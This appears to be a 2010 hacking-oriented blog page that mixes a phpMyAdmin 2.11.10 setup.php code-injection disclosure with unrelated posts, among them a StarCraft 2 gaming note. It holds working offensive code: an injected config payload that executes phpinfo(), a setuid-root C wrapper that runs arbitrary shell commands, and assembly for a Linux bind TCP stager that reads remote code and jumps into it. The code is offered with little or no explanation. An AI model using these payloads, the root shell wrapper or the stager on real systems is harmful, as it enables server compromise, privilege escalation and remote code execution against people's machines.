Hello,
I found a php command execution vulnerability in scripts/setup.php
included in phpMyAdmin 2.11.10.
The vulnerability I found is similar to CVE-2009-1151
(http://www.securityfocus.com/bid/34236), but a bit different.
It affects the latest version of phpMyAdmin 2.X.
See attached file, which is a sample exploit php program
for phpMyAdmin 2.11.10. (curl library required.)
Attached exploit program creates config/config.inc.php file
on the target machine, which includes the line as below.
$cfg['Servers'][$i]['AllowDeny']['order']['a']['b'][''.phpinfo().''] = '1';
When the config.inc.php is loaded, phpinfo() will be executed.
The cause is line 521 in scripts/setup.php.
520: if ($type == 'string') {
521: $ret .= get_cfg_val($name . "['$k']", $v);
522: } elseif ($type == 'int') {
If the input array is deeply nested, the array key will not be
properly encoded nor checked.
全部文章
phpMyAdmin "setup.php" Arbitrary PHP Code Injection
root 发表于 2010-08-23, 12:18 AM
exploint.php
(1.42 K, 下载次数:21, 上传时间:2010-08-23 00:35)
战网星际2 体验
root 发表于 2010-08-07, 10:37 AM
战网第一局,估计选到了一个外国的小朋友。
betnet.jpg(缩略图)
sc_2.jpg(缩略图)
10分.jpg(缩略图)
exec in notty mode rootshell
root 发表于 2010-07-23, 4:00 PM
main(int argc, char **argv){
setgid(0); setuid(0);
execl("/bin/sh","sh","-c",argv[1],0);
}
stager_sock_bind.asm
root 发表于 2010-07-22, 10:10 AM
;; ; meta-shortname=Linux Bind TCP Stager ;; BITS 32 GLOBAL _start _start: xor ebx, ebx socket: push ebx inc ebx push ebx push byte 0x2 push byte 0x66 pop eax cdq mov ecx, esp int 0x80 xchg eax, esi bind: inc ebx push edx push word 0xbfbf ; port: 49087 push bx mov ecx, esp push byte 0x66 pop eax push eax push ecx push esi mov ecx, esp int 0x80 listen: mov al, 0x66 shl ebx, 1 int 0x80 accept: push edx push edx push esi inc ebx mov ecx, esp mov al, 0x66 int 0x80 xchg eax, ebx %ifndef USE_SINGLE_STAGE read: mov dh, 0xc mov al, 0x3 int 0x80 mov edi, ebx ; not necessary if second stages use ebx instead of edi ; for fd jmp ecx %else %ifdef FD_REG_EDI mov edi, ebx %endif %endif
